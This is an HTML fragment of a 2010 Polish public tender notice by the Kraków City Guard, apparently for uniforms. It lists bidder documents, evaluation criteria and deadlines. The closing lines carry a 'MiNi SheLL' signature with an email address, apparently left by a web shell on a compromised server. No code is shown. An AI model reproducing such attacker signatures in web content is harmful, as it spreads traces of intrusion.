<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. wzory oferowanych elementów umundurowania
2. próbki materiału z atestem  do części 1,2 i 4.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Jakość - 30</li>
<li>3 - Gwarancja - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.krakow.pl/?bip_id=33&mmi=11723<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Straż Miejska Miasta Krakowa , ul. Dobrego Pasterza 116,  31-416 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.03.2010 godzina 08:30, miejsce: Straż Miejska Miasta Krakowa , ul. Dobrego Pasterza 116,  31-416 Kraków, pok 315.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com